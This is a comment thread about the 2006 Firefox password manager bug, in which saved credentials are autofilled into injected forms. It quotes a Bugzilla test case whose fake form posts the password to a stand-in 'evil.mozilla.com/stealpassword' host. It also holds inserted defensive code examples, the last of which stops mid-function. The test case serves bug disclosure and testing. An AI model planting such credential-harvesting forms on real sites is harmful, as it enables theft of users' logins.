Firefox 2.0 Password Manager Bug Exposes Passwords
zbuffered writes, "Today, Mozilla made public bug #360493, which exposes Firefox's Password Manager on many public sites. The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain. For example, username/password input tags on a Myspace user's site will be unhelpfully propagated with the visitor's Myspace.com credentials. It was first discovered in the wild by Netcraft on Oct. 27. As this proof-of-concept illustrates, because the username/password fields need not be visible on the page, your password can be stolen in an almost completely transparent fashion. Stopgap solutions include avoiding using Password Manager and the Master Password Timeout Firefox extension, which will at least cause a prompt before the fields are filled. However, in the original case detailed in the bug report, the phish mimicked the login.myspace.com site almost perfectly, causing many users to believe they needed to log in. A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability, is available from the bug's original author."
...secure by design!!
...as though millions of Firefox users were laughing at IE users, and were suddenly silenced.
Cue "still more secure" arguments now.
Now that it's 2006, can we now use a better form of "authentication" than a few ASCII characters?
Every website wants you to have a password. You know, for important stuff like making a purchase because you use a password for a purchase at a brick and mortar store, right?
Well, since it's a good practice to use unique passwords, and users get forgetful, then they use the web browser tool to store their passwords, then they forget their passwords, and when they use another computer or update their existing one, their tool does not work, and if it does work, then the browser gives away your passwords.
I don't use a password to get into my home, I don't start my car with a password, I don't use a password to get into my work. In fact, I don't even have a key for my work, server room, nothing (RFID). But all day at work, these programs continually ask for my password to the point that I don't consider my password secure because I have to change it, and use it so much, I'm desensisized (sp?) and say who cares?
Can we get over passwords soon?
People actually let their browsers remember their passwords? I have never trusted my browser that much.
The masses are the crack whores of religion.
Stopgap solutions are not a solution, I guess they're planning a 2.0.1 soon? The bug has been reported 10 days ago...
The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain.
Worst idea ever. The question isn't why wasn't this discovered earlier, but who decided this was a good idea in the first place?
What?
According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.
So much for me being smug about going back to Firefox 1.5!
A pizza of radius z and thickness a has a volume of pi z z a
...using Microsoft Internet Explorer. AAaaaaaaaaaaaargh!
If you mod me down, I shall become more powerful than you could possibly imagine.
My feeling is, people who rely on "password managers" get what they deserve when their passwords end up in the wrong hands. It's generally just a bad idea to store passwords anywhere but your head.
+0 Meh
RTFA?
The hell, you say.
'Tis slashdot, bucko:
No read-read today.
Always for good suds we pray.
Burma Shave
Get thee glass eyes, and, like a scurvy politician, seem to see things thou dost not.--King Lear
It also took me a while to figure out how to remove the close button from each tab. The tab scrolling "feature" was also a point of great annoyance that took up more of my time to find a fix.
In short I'm just not jumping for joy over FF. This new flaw happens to come to light the day after I search Google for a way to manually add userids and passwords to the FF DB (any ideas?). This was to address the problem of FF not picking up some text fields as userid and password fields. One solution I found was RoboForm, though I'm not sure I want to pay for what I think should be a fairly easy thing to do inside FF. FF is getting better but personally I'd rather be using Mozilla 1.7.x.
I love firefox and am very thankful for it being opensource but I loathe how Mozilla chooses to track and report bugs. I have been going around for days and could've been exploited - possibly but not probably - instead of being able to take appropriate measures to protect myself. It's not like this was some little secret the code was already out in the wild to do it. I find this security through obscurity in opensource projects absolutely disgusting. While we are possibly getting compromised they are sitting on their hands. We, the community, are here to quickly fix problems like these too. Thousands of developers could've and would work on this who the bug was hidden from. This makes the development process absolutely useless...
I thought the rule of thumb for any user-created content was to never allow freeform html? You either let them control their formatting with a separate markup (like BBCode), or you limit them to specific tags (like they do here). In neither of these situations is this exploit possible.
Allowing full html coding, including embedding java or javascript, is an invitation for the unscrupulous. That's one of the 500 reasons I can think of to never visit a website like myspace.
That said, much like language, the web is defined by its users. While I don't feel like it's Firefox's responsibility to fix issues like this, they'd do best to be aware of it. It wouldn't be a bad idea at all to tie password remembering to the exact url (at least everything up to the "?") by default.
Money I owe, money-iy-ay
Of course it's far less shocking that the same bug is present in IE6 and IE7! I wonder which browser you will be recommending... do you know of one that passes the test-case linked to from the bugzilla page?
A pizza of radius z and thickness a has a volume of pi z z a
If you have 50-100 passwords at various sites, established over years, there's really a shortage of other good options. You can go the old-school route and just write them all down on a pad of paper, or the slightly more sophisticated route and put them in a text file or encrypted database on your local machine, but that doesn't help you when you want to log into a site from another machine.
I was disappointed to hear of this vulnerability, because I use Google Browser Sync pretty heavily for keeping track of cookies and trivial passwords, and to be honest I'm not really sure what I'd do without it. More important passwords I keep in an old Palm Pilot using a GPLed password-management and generation program on it, but recalling passwords from it is a pain (takes several minutes to get Palm out, type in master password, etc.).
"Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
That is disturbing to me since I use FF2 to store many of my passwords. However, I don't store passwords for more critical sites, like my bank's website. I recommend others do the same.
I tested IE6 and IE7 and the proof of concept page failed to work in both browsers. Neither browser passes the stored browser on to Google.
Have you personally tested this and found either browser to be vulnerable?
Pax Digitalia
Right, because you contribute to Firefox, right? If you did, you'd of course have been able to spot this bug with your razor-sharp eyes, right? Oh wait... no, I just remembered you're fallible too, and quite possibly an idiot. Firefox is free. The dev team doesn't have to do shit, they choose to. Stop acting like an entitled 8-year-old at Christmas, and do something useful with your time.
ResidntGeek
Perhaps there is code to not work if it detects the User Agent for anything other than FF2.0?
"I am the king of the Romans, and am superior to rules of grammar!"
-Sigismund, Holy Roman Emperor (1368-1437)
I am still using FF1.5 because of all the problems with 2.0. Not just bugs like these, although they are disappointing, but reports of the ever present memory leak and the annoying revamps to the tabs bar. Then again, I am eagerly looking forward to upgrade to a better version so I can get some of the improvements, like crash restoration.
I'm running 1.5 and the exploit worked for me.
I stole this Sig
Does anyone know if this attack is possible on Opera? Opera's wand has been around longer than FireFox has, so I'm kinda curious. It seems like something people could exploit in more than just FireFox.
FanFictionRecs.net
And where's the patch for this? If the bug was hidden from all, then why would they go public with it without a patch? And why would they hide it in the first place? Open source developers could have submitted patches already!
It would seem sort of silly to me to stop advocating Firefox because it has one BIG bug. Most browsers have 100 HUGE bugs. It is still better than any other browser.
I wouldn't think this would be a hard fix. Silly Firefox development team. =)
Firefox 2.0 - Spell Rightly.
There is a neat little piece of javascript at http://www.xs4all.nl/~jlpoutre/BoT/Javascript/PasswordComposer/ that lets you just think up a master password in your head and then use this applet to automatically generate a site-specific, unique hash and fill in the password field automatically. This way you can remember the passwords easily, you never have to save them or write them down. And if one site gets compromised, that password (the hash) won't work with any other site. The drawback is that if you don't have this piece of javascript then you can't get into your sites.
Did you even look at the source?
Thought until now of multiple personality but mystery solved! It was just my browser!...
PS: I shall not be held accountable for ANY of my comments...
Does anyone know if Konqueror (using KDE Wallet) is affected? And what about other browsers, like Opera, Epiphany, and so on? I'd just like to know how common this type of exploit is.
Damn. I didn't expect that used a blockquote didn't leave HTML intact ...
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>bug 360493</title>
</head>
<body>
<ol>
<li>Enter real name and real password and submit real form.</li>
<li>Choose Remember this password.</li>
<li>Submit fake form</li>
<li>Test fails if evil.mozilla.com gets real password</li>
</ol>
<div>
<form name="real" action="#" method="get">
<div>
real name <input name="name" type="text"/>
real password <input name="password" type="password"/>
<input type="submit" value="real form"/>
</div>
</form>
</div>
<div>
<form name="fake" action="http://evil.mozilla.com/stealpassword" method="get">
<div>
fake name <input name="name" type="text"/>
fake password <input name="password" type="password"/>
<input type="submit" value="fake form"/>
</div>
</form>
</div>
</body>
</html>
Remember the Java ring? It had a processor and stored the private key in a tamper resistant case (erases instantly when case is compromised). PC programs would ask the Java ring to sign things. A virus could get bogus signatures while it was connected, but couldn't compromise the key. Unfortunately, it used a funky "One Wire" adaptor to get power and talk to a PC. If only they would reintroduce it in a USB format!
If we follow your flawed logic to its conclusion, you're arguing that an open source project should be immune from criticism because it's charity. Do you think that open source contributors should not be accountable for major security screw ups?
Firefox may be free. However, its developers are just as accountable for their mistakes as Microsoft should be for its own. Firefox gained the market share that it has because of a reputation for security. When the dev staff screw up so badly, it does a lot to erode their reputation. Though I may not contribute to the project, I have a right as an end user to expect a relatively secure product. The occasional, obscure buffer overflow exploit is excusable. A massive flaw in conception, design, and execution is certainly not.
I think that you've misunderstood not only my initial post but also the fundamental philosophy behind the open source movement. If every developer thought as you did, no end users would bother to use your goods. Judging from your haughty demeanor, I suspect you consider this a good thing.
Pax Digitalia
Actually the word is "Filthy".
Same here in 1.5.0.2
... this is just because IE6/7 have poor compatibility with the rest of the world. They can't even support the exploits, anymore, honestly.
OK, jokes aside, someone just released an exploit into the wild which *can't work on IE*. And they presumably still thought they were going to get something of value on it. Hiya, FireFox, welcome to the "visible enough to be a target" club. And it only gets worse. I hope your million bug finding eyes are bright and perky because it only gets worse and it never, ever stops.
Help poke pirates in the eyepatch, arr.
While I agree FF should alert the user, this is not a hole in FF's security architecture. It's rather a software level bug. Moral of the story: 1. don't be lazy and ask your browser to remember your password. 2. if you insist to be lazy, store passwords only for trivial web accounts.
DEERPARK 1.5.0.4 is also vulnerable - based on firefox 1.5
No big deal. Since I use Thunderbird to check my email, and I don't pay for anything, there's nothing worth stealing. "OH NOES! SOMEONEZ HAX0R3D MY YTMND PASSWORD! T3H W0R1D IS 3ND1NG!!!!!!111one1" Seriously, all my important passwords (such as my Slashdot password), are stored in the most important place available: my brain. I figure, "If I can't remember the password for this site, this site is obviously inferior and not worthy of my attention!"
I don't get why posts are limited to 120 characters. Seems unreasonable to me. I mean, just because I like having a real
If you have form autocomplete on, credit card numbers are stored in plaintext on your hard disk too. Bug's been open for .. what about 4 years now.
They refuse to fix it, they say it's not a bug.
I don't think it's vulnerable to this because it's not fully automatic, however, all someone has to do to get your credit card number is type the first digit and it'll fill in the rest.
Their advice, "Don't use autocomplete".
I've had enough abrasive sigs. Kittens are cute and fuzzy.
Though to be clear exactly it will only forward form input to URLs that appear in form inputs on the same site (domain, that is.) Like the article says, it will only allow say a myspace user to steal your myspace password, he won't be able to steal passwords from other domains, though he will be able to use a non-myspace site to collect the stolen information and that's the bigger portion of the problem. I don't know whether I would classify this *only* as a bug in the browser, rather also a bug in the websites for allowing users of the websites to output form HTML tags that don't reference back into the CMS.
In any case, it should be fixed in *both* places -- a lot of wikiware probably also has the potential to allow this exploit, and should be fixed not to. In addition to fixing browsers to check the form URL before autofilling, restricting autofilling form inputs to same-page on the browser side would be a good option to have for the paranoid, but I'm betting it will break a lot of sites ("break" as in require the password to be put in a whole lot of times) that take login information in from more than one URL.
Someone had to do it.
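The browser-side check proposed in the comments above (compare the form's submit URL before autofilling, with an optional same-page restriction "up to the ?"), as an added example that is not part of the thread and is not Firefox's code. `shouldAutofill`, the shape of the saved-login record and `site.example` are assumptions; `evil.mozilla.com` is the host used in the test case quoted earlier in the thread.

```javascript
// Added example, not Firefox's implementation. Function names and the shape
// of the saved-login record are hypothetical.

// Constructed sample: a login saved on the site's real login page.
const SAVED = {
  pageUrl: "http://site.example/login",   // page where the password was saved
  submitUrl: "http://site.example/login", // where the real form posted it
};

// "Everything up to the ?": origin plus path, ignoring query and fragment.
function pageKey(url) {
  return url.origin + url.pathname;
}

// Resolve the action attribute the way a browser does: relative to the page.
// A missing or empty action submits back to the page itself.
function resolveAction(pageUrl, actionAttr) {
  try {
    return new URL(actionAttr || "", pageUrl);
  } catch (e) {
    return null; // unparsable action: treat as untrusted
  }
}

// mode "origin":     page and form target must match the saved login's origins.
// mode "exact-page": additionally, the page itself must be the saved page.
function shouldAutofill(saved, pageUrl, actionAttr, mode = "origin") {
  const deny = (reason) => ({ fill: false, reason });
  let page, savedPage, savedSubmit;
  try {
    page = new URL(pageUrl);
    savedPage = new URL(saved.pageUrl);
    savedSubmit = new URL(saved.submitUrl);
  } catch (e) {
    return deny("unparsable page or saved URL");
  }

  const action = resolveAction(pageUrl, actionAttr);
  if (!action) return deny("unparsable form action");
  if (action.protocol !== "http:" && action.protocol !== "https:") {
    return deny("form action is not an http(s) URL");
  }
  if (page.origin !== savedPage.origin) {
    return deny("page origin differs from the saved login");
  }
  // The check missing in the reported bug: where will the filled form go?
  if (action.origin !== savedSubmit.origin) {
    return deny("form submits to " + action.origin);
  }
  if (mode === "exact-page" && pageKey(page) !== pageKey(savedPage)) {
    return deny("page is not the one the login was saved on");
  }
  return { fill: true, reason: "ok" };
}

// Constructed cases mirroring the thread: the real form, the fake form from
// the test case, and a user-content page that posts back to the real login.
const CASES = [
  ["http://site.example/login", "#", "origin"],
  ["http://site.example/profile/123", "http://evil.mozilla.com/stealpassword", "origin"],
  ["http://site.example/profile/123", "/login", "origin"],
  ["http://site.example/profile/123", "/login", "exact-page"],
];
for (const [pageUrl, action, mode] of CASES) {
  const verdict = shouldAutofill(SAVED, pageUrl, action, mode);
  console.log(mode.padEnd(10), pageUrl, "->", action, ":", verdict.reason);
}
```

The third case shows the trade-off raised in the comment: origin matching still fills a form on a user-content page as long as it posts back to the site, while the exact-page mode refuses it at the cost of more prompts on sites that take logins from several URLs.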
i'm using firefox 2.0 on linux, first my popup blocker would allow the site to open when i clicked on the video like the instructions said, then when i allowed it i just got youtube.com?
"if i'd known it was harmless, i'd have killed it myself"
Just remember your freaking passwords in your head, is it that hard?
I for one only use the browsers store password feature for the most trivial of sites. For more important sites, I use Password Safe. The program and the database fit easily on a thumb drive, and requires a master password to access. It has a user configurable time out, and a double click on an account copies the data to the clipboard for later use, allowing you to foil keyboard based sniffers.
IANAL... But I play one on
I set my agent ID as firefox in Konqueror but the exploit didn't work. Damn, one of the few things user agent can't emulate.
OpenID seems to be the right approach to this. Login once (Passport-like), but to your own server -- it could be a password, a key exchange, whatever, the idea is to produce some sort of session cookie that your server can check. You can login to any other site, but through a process which doesn't give that site any kind of credentials to use on other sites, and you can restrict which sites may check your identity at all.
I'm not sure how this would protect against this kind of vulnerability, but I am convinced it's the right approach, overall, to authentication.
Don't thank God, thank a doctor!
You're actually having a better experience than many people.
About a year ago I helped my father-in-law switch to Firefox. He recently decided to try Firefox 2.0, but had a lot of problems with it. One was that it made his computer slow down a lot. So on the weekend when my wife and I went to visit, I took a look at his PC. Sure enough, it was terribly slow when using Firefox.
See, he has a machine with "only" 512 MB of RAM. What did Firefox do? According to Task Manager, it was consuming 1896 MB of RAM. I remember the number exactly, as it was 100 years before my son was born. Sure enough, the machine would thrash to a terrible extent. I removed all traces of Firefox, and reinstalled it. No third-party plugins were used, yet we found the exact same problems.
Our final solution was Opera. Unlike Firefox, he reports that it hasn't measured above 35 MB of RAM consumption.
Here is a quick clarification about Internet Explorer 6/7.
5 426
The attack at MySpace worked against IE users because many were lured into typing their passwords into a form. I saw this in action. It was almost indistinguishable from the legitimate version.
The Bugzilla reference to IE 6/7 was not a comment on the info-svc proof, but the proof at
https://bugzilla.mozilla.org/attachment.cgi?id=24
That form does some interesting things in both browsers, but it does not reflect a normal client/server situation. IE's password manager behaves differently from Firefox when dealing with forms on more than one page, as in the info-svc proof.
In my opinion, both browsers should raise a warning when a cross-site form is loaded, or have that option.
Enjoy
Robert Chapin
Chapin Information Services, Inc.
I'm using Opera 9.02 under Linux (Kubuntu 6.10), and could not get the proof-of-concept to work with Wand (Opera's Password Management). I don't think this would be much of an issue with any browser, though, if people would just use some common sense and not store passwords for important things like online banking. While it might suck to have someone exploit this for your Slashdot account and start trolling using your UID, it would be nothing more than an inconvenience. Online banking and credit card transactions, on the other hand, would be major problems. So really, this is a non-issue if you are already a security-minded person. The question: How many normal users are security-minded? The answer is, unfortunately, rather obvious, I think.
"We may face a scorched and lifeless earth, but they're accountable to their shareholders first."
If you are falling back on a single password, then that password can be ridiculously secure. I use a big diceware password http://world.std.com/~reinhold/diceware.html, along with a keepass database http://keepass.sourceforge.net/ Assuming that we aren't dealing with keyloggers, that is perfectly secure. ...first post
Opera, my one true love... I shall never leave thee.
I have MS password management to control access to my Firefox password manager.
Phew!
668: Neighbour of the Beast
I have two types of passwords: The ones for fluff sites, like Slashdot, Wikipedia, hotmail (a.k.a. Spam box), and so forth, which usually get 1 of 2 passwords. Then for banks and credit cards and what have you, I use real passwords with different ones for each site.
I could care less if someone hacks my Slashdot account or my wikipedia account. The worst thing they can do is vandalize under my name. And as for hotmail, they can have my spam. And were I to have a myspace account, I could care less if someone got that too.
Fortunately, my bank and credit card companies don't allow others to create their own pages, so I'm not too concerned. I suspect this will get fixed long before it becomes a concern for me.
I was poking around a few days ago trying to get a userContent.css file to use a local filesystem png file as a background, without having to resort to huge data: URIs.
Eventually I'd thrown enough random ideas at the problem that I ended up finding out about this nightmare waiting to happen. Just for kicks I tried putting some code in the CSS to alert() all the (supposedly hidden) password values on the page. It worked.
They're just using MD5, which you could reproduce on any computer. In fact, that's how I generate _all_ my passwords:
echo "user:domain:iteration:masterpass" | binary hash | base64 | take first 16 characters
It's a simple algorithm which you don't need to keep secret. Also, you can write down the made-up user/domain/iteration triplets. All you need to keep secure is the master password. Thanks to the iteration, you can lose a generated password without affecting the secrecy of your master password or all the other passwords.
A simpler version would be to take the ASCII hash directly as a password. However, using a binary hash and base64-encoding it allows you to cram more entropy per character into the resulting password.
Of course it runs NetBSD. BTC: 1NT7QvbetmANwaMzhpVL6
They took out the "load images from the originating site only". That was the only safe way I could surf fark.com at work, since forum posters just LOVE to post not-work-safe images. That, and I worry about someone posting an image from a porn site, and the firewall logs would be on me.
I don't mind that the program allows me to be stupid. Big deal...... I do mind however things like drive by hacks, (via activeX) cross-site scripting (ala JavaScript) etc. But do I expect the browser to be my mommy.... NO As for the supposed FF memory leak. That isn't the one that should affect you the most.... Cerebellum Memorus Diareatalis should.
I'm sorry, I'm too tired to be witty at the moment so this message will have to do.
PassPet is a nifty looking extension that hasn't actually been developed. Would help with this problem, as you have to actually click a button to fill in your password.
I just ran the test on 1.5.0.7 and I am not affected.
Somehow Firefox 1.5.0.8 seems to allow this exploit also. Are you sure 1.5.0.7 isn't vulnerable? If so, then wow I guess things went backwards between the two releases.
maybe it doesn't work the same on ubuntu
Although this could actually be why, I ran the test on a Windows XP Pro machine. If this only happens on Windows (though I don't know this for certain) chances are it might not be the Firefox team's fault after all. Interesting that 1passwd appears to have released a new version of their password manager little over a week ago before this exploit became publicly known. Mac users might like the OS X keychain integration.
I would love to test whether it works when firefox is using the noscript addon, but I cannot, because I don't use the password manager, it is just retarded to let your browser remember your passwords, really.
Copyright infringement is "piracy" in the same way DRM is "consumer rape"
Or it shows why Debian and Debian based distros don't like to wait for mozilla for a fix.
The Firefox team's real intent here was to keep all the geeks off myspace, or any "social networking site" for that matter. Shame on all of you for not knowing better!
Not sure I understand what's supposed to happen. After clicking on the vid (on Chapin Information Service's demo), am I supposed to automatically go to Google? Chapin's demo exploit seems to tell me that I would be redirected to Google.com. It didn't...it went to YouTube where I was logged in under my normal user:pass. I didn't see any sign of anything in the address bar revealing my Chapin user:pass. Is the fact that I already had a YouTube account registered with Password Manager what caused the exploit to fail? Also, my popup blocker stopped Chapin's site from launching something first time through. Was this what threw a wrench in it? I tried manually going to Google.com immediately after clicking on the vid another time through (registering the same user:pass as the first time), but I just don't see anything to indicate that the exploit worked (my user:pass from the demo appears in Google's address bar? Not that I could see.). Can someone please explain in a bit more detail what should have happened? Mozilla's exploit demo seemed to fail as well, dumping me on a "server not found" error page, but maybe that's what it's supposed to do if the exploit worked.
Tried the second demo on Mozilla's bugtracker. My popup blocker stopped a new window from launching. Nothing else happened that I could tell.
Appreciation expressed in advance to anyone who can enlighten me on what I should be experiencing in Firefox 2. Is this a Windows-version-only thing? I'm on Fedora Core 5.
* * * * *
All mankind is divided into three classes: those that are immovable, those that are movable, and those that move.
--Benjamin Franklin
I ran it (the proof of concept) on the same version and it didn't transmit anything to google.
Konqueror _is_ immune, our password storing system was written by a paranoid security expert.
There are options but you do have to know where to look and most people don't. One program I use at both home and work is Oubliette (Windows only I'm afraid).
It's very easy to use and has encryption so I can carry all my passwords on a USB stick and know even if I lose it no one can get my passwords (unless they hack the master password).
aus.music.scrapbook
I can get into all relevant government sites and many large private sites in Denmark with my government backed digital signature. Digital signatures are supported by the major browsers.
The main problem is that there is a fee for the web site for using it, which means it is not useful for small or amateur sites, they still rely on passwords.
MySpace trusts its users WAYYYY too much. I think it filters out <script tags, but beyond that I make no promises. Any site that needs to warn its users that "using HTML and CSS to hide MySpace's advertisements is not permitted" is asking for it, big time. Note that at least a few profiles do hide the ads anyhow (on those occasions where I visit the site using a browser that will show ads) and some may actually circumvent the scripting restrictions, even.
The advantage is you get to assault your visitors' eyes with a combination of bad programming and bad taste... or just bad design in general (links that go to 24px and bold on MouseOver?!? Blue text on blue backgrounds? You get the idea...) You can put up flash (good for music, videos, games, and remote code execution exploits) and forms (doesn't everybody love surveys? What about a way to post comments without scrolling ALL the way to the bottom of the page? Surely you don't have an issue with default buttons that go... somewhere! I know... let's sneak a Password field on there.) I haven't been to the site in a month or two, which means it is settling blissfully into the recesses of my mind...
There's no place I could be, since I've found Serenity...
It is not a bug with firefox, it is a bug with myspace.
I doubt you will find many places other than myspace where this "bug" will be exploited. Why? Because most sites that host user generated content are responsible enough to remove the users' ability to post potentially-malicious markup language on the site. These sites strip almost all (if not all) markup and only allow a small handful of decoration tags like BOLD. (Slashdot is a perfect example of allowed html markup)
The problem is that the code on myspace is shoddy at best, and the fact that users can put any kind of html on their myspace page was an accidental result of such. Then when users figured out they could customize their page with css and other markup code they were happy, and so myspace left it in.
Nowadays everyone is so used to myspace letting them customize their page (in a shitty hack sort of way) that if they were to take that aspect away I think myspace would die in a month (I know a lot of girls who only go on myspace so that they can upgrade their page and make it look better by customizing it) so they are not likely to ditch this "feature" of their site.
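The site-side filtering this comment and the earlier one about BBCode describe (allow only a handful of decoration tags), as an added example that is not part of the thread and not any site's actual filter. The tag list and function names are assumptions, and the sample markup is constructed from the fake form in the test case quoted earlier.

```javascript
// Added example, not MySpace's or Slashdot's code. The allowlist and the
// function names are hypothetical.
const ALLOWED_TAGS = ["b", "i", "em", "strong", "p", "br", "blockquote"];

// Matches an allowlisted tag in its *escaped* form, and only when it carries
// no attributes: &lt;b&gt;, &lt;/b&gt;, &lt;br/&gt; ...
const BARE_ALLOWED = new RegExp(
  "&lt;(/?)(" + ALLOWED_TAGS.join("|") + ")\\s*/?&gt;", "gi");

function escapeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Escape everything first, then restore only bare allowlisted tags. Anything
// else, including <form>, <input> and any tag with attributes, stays inert
// text, so no live "<" reaches the page except as part of a restored tag.
// Returns the safe HTML plus the names of tags that were left neutralised,
// which is worth logging: form/input in a profile is a sign of the attack
// discussed in this thread.
function filterUserMarkup(input) {
  const html = escapeHtml(input).replace(
    BARE_ALLOWED,
    (match, slash, name) => "<" + slash + name.toLowerCase() + ">");
  const blocked = new Set();
  for (const m of html.matchAll(/&lt;\/?([a-z][a-z0-9]*)/gi)) {
    blocked.add(m[1].toLowerCase());
  }
  return { html, blocked: [...blocked].sort() };
}

// Constructed sample: harmless formatting followed by the fake login form.
const SAMPLE =
  'About me: <b>hi</b><br/>' +
  '<form name="fake" action="http://evil.mozilla.com/stealpassword" method="get">' +
  '<input name="name" type="text"/><input name="password" type="password"/>' +
  '</form>';

const result = filterUserMarkup(SAMPLE);
console.log(result.html);
console.log("neutralised tags:", result.blocked.join(", "));
```

Because the filter never emits a live `form` or `input` element, the password manager has nothing to fill on the user-controlled page, whichever browser the visitor runs.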
According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.
They say it exists in IE 6/7, so they don't look like the only fool.
So how do they explain the fact that it really 'doesn't exist' in IE 6/7, and doesn't this make them look even more foolish?
And no I won't defend IE6 or even IE7. But keep the facts where they are; this is not an IE exploit.
history | less ?
Get your own free personal location tracker
Firefox started to disappoint me. I do still belong to mustdie crowd but FF starts to irritate me.
First, it deletes files when they are dragged into the browser window . IE won't even allow you to do the dragging.
Second, if you are getting messages from your Yahoo groups by e-mail on your gmail account, the Yahoo ads are overlaying the text. IE does not do that.
I can easily foresee that if this will continue I am going to consider switching to some other browser. Any recommendations?
I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
From what I have read, it takes a n00b to be fooled in that way. AFAIU, the phishing succeeds only if you send the autocompleted form. Who in the right mind would send the form that appeared from nowhere? If I do not expect a form in this place, I do not submit it.
I suspect that many bugs like that can be easily avoided by clean behaviour.
I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
I was wondering, if FF or any browser auto-populates your login fields, couldn't someone use Ajax to just grab the values and send them to the server before you even hit submit?
Although it's not a very comfortable conclusion, I have to agree. People promoting OSS are quick to say in response to a suggestion/complaint they don't like "get the source and fix it". I wrote an open source, free program that some people used, and this temptation was strong for me too.
But after thinking about it, I realized that this attitude is *totally useless*. Most of your users are not going to be programmers and if you want to provide something useful, you have to also provide useful support. There are plenty of casual/vanity OSS projects that are just programmers thinking "maybe someone else will like my quick hack", but they don't go anywhere usually.
For every expert, there is an equal and opposite expert. - Arthur C. Clarke
Firefox is far from paranoid, if you as a simple enduser do not know where to set a master password for the password manager, any person able to use your firefox can see all passwords you gave to it, simply by clicking Tools - Options - 'security' - Show Passwords.
"Firefox .. it deletes files when they are dragged into the browser window . IE won't even allow you to do the dragging"
..
Here on FF 2.0 it does no such thing, just opens up in a window, does not delete.
"if you are getting messages from your Yahoo groups by e-mail on your gmail account, the Yahoo ads are overlaying the text. IE does not do that"
I don't understand, does yahoo include adverts in the email? Here on FF 2.0 I have no such problem. I don't even see the adverts in Yahoo as I have adblock enabled.
"I can easily foresee that if this will continue I am going to consider switching to some other browser. Any recommendations?"
Yea, go back to IE7, all the rest are written by sandal wearing, long hair communist hippies
was Re:FF problems
davecb5620@gmail.com
Whenever FF is talked about, at least once mention the memory leak problem .. :)
.. 300MB RAM, FF = 52MB.
"he has a machine with "only" 512 MB of RAM. What did Firefox do? According to Task Manager, it was consuming 1896 MB of RAM"
I have never experienced the fabled FF memory problem
was You're lucky. (Score:5, memory leak fud)
davecb5620@gmail.com
Me too. didn't store pass in the pass. manager either, even when I clicked the remember password button. Even with the NoScript extension disabled
Bugs are bugs, they happen.
With Open source many eyes and many hands work to fix the bugs.
With closed source only a small group can see or fix the source, and the "originator" of the program may not even want to acknowledge the bug.
Just switch to Opera. www.opera.com
PENAROL: You will be eternal like time and you will bloom every spring.
I could be mistaken, but couldn't the need for the user to submit the form (request) be sidestepped with AJAX/Web 2.0 scripting, sending the password as soon as the field is populated? Or does the obfuscation of the password field in the browser prevent this?
Open Standards Portal
I just tested it with Seamonkey 1.0.6 (I prefer it over firefox) and the exploit happens on it as well.
Does the name Pavlov ring a bell?
After carefully examining the issue, I come to the conclusion, that for this supposed issue to show up, it means that the legitimate site you are visiting has been hijacked, and a fake login form inserted. If that is the case, the user is liable to enter the username and password. Firefox password manager or not: when the user clicks submit, the password goes to the other site, whether password manager is enabled or not.
Anyone who can inject arbitrary HTML can possibly get your password. This isn't a bug, it's a consequence of submitting your password using an HTML form, and allowing other users fine control of what scripting and form elements appear on the page.
Sites that wish to guard against such attacks should utilize the more robust systems available for authentication, which include: HTTP authentication and Client-side SSL certificates. In both of these cases, an HTML page need not have direct access to the authentication information provided by the user to the web server.
Users of the browser should just be aware that 'password manager' is not an anti-phishing feature in this version of Firefox -- if the site you are visiting wishes to spill your password to another site, when you login, nothing can stop them, whether you use password manager or not. In fact, they can use AJAX to send your password to who knows what other sites in the world, from the moment you start typing it into an HTML form.
I only hit 'save password' for places where it's safe to do, and when I do so, I rather have it err on the side of filling in a password field, than ever have it err on the side of 'not filling in the password', because it thinks a form might be fake. I'll be the judge of that.
Cross-site forms are a feature of HTML. The issue in this case is that a page author can insert a malicious password form on a legitimate site in the first place.
Exploitation of this so called "bug" relies on the site you visit cooperating with the outside site.
That tells me it's not a bug in password manager. The bug is that a site allows a malicious login form to appear on it in the first place. EOM.
Got duped to this one in about 30 seconds... and it's over 10 months old.
Javascript, no. Maybe you're not clear on how this works?
XSS, kind of, yes.
This exploit requires someone be able to insert a <form> element on a trusted site. (A site that you trust at least to have an account with.) The form gets the login info auto-populated by Password Manager, but then submits the results to a different site. This compromises the trusted site's credentials.
I use Password Manager, but rarely let it save passwords. (You're given the option each time, you know.) There are specific situations where it comes in handy for me, and thankfully none of them would expose me to a malicious use of this exploit. So, modulo your lack of specificity on the scenarios that make its use retarded, we agree.
Being security conscious, I (also) use NoScript. The exploit works even with both sites forbidden. So you know. No need for you to go configuring Password Manager to test it. (Which would not have been hard to do — it's a checkbox.)
As for the question of whether this is a Firefox security hole, I think it is. At least partly. Sure, XSS injection is a site-specific vulnerability. That much is the site's fault. But silently performing a credentials fill-in for cross-site form posting in an environment where XSS may happen... This is not ideal. Surely there must be some solution like tying the credentials not just to a domain and/or specific page, but to the triple of URL+form+action. Maybe this is hard to do if the populating is done before the action can be known for sure (as the form action attribute may change after population and before submission).
I can imagine having Firefox perform a check at the moment it attempts to submit: Did we auto-fill the credentials, and is the URL+form+action the same? If so, go ahead. If not, warn user.
Wonder what will come of this all?
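The submit-time check proposed in the comment above, sketched as an added example (not part of the original thread and not Firefox's own code). The function names, the record layout and the example.test / .invalid URLs are assumptions made for illustration.

```javascript
// Added illustration; names and URLs are hypothetical, sample data is constructed.

// Reduce a form to the URL+form+action triple the comment proposes.
function formTriple(pageUrl, formId, action) {
  const page = new URL(pageUrl);
  // Relative actions resolve against the page; an empty action posts back to it.
  const target = new URL(action || pageUrl, pageUrl);
  return JSON.stringify([page.origin + page.pathname, formId,
                         target.origin + target.pathname]);
}

// Fill only a form whose triple equals the one recorded when the login was saved.
function shouldAutofill(savedTriple, form) {
  return savedTriple === formTriple(form.pageUrl, form.id, form.action);
}

// Re-check at submit time, because the action can change after the fill.
function submitDecision(savedTriple, form, wasAutofilled) {
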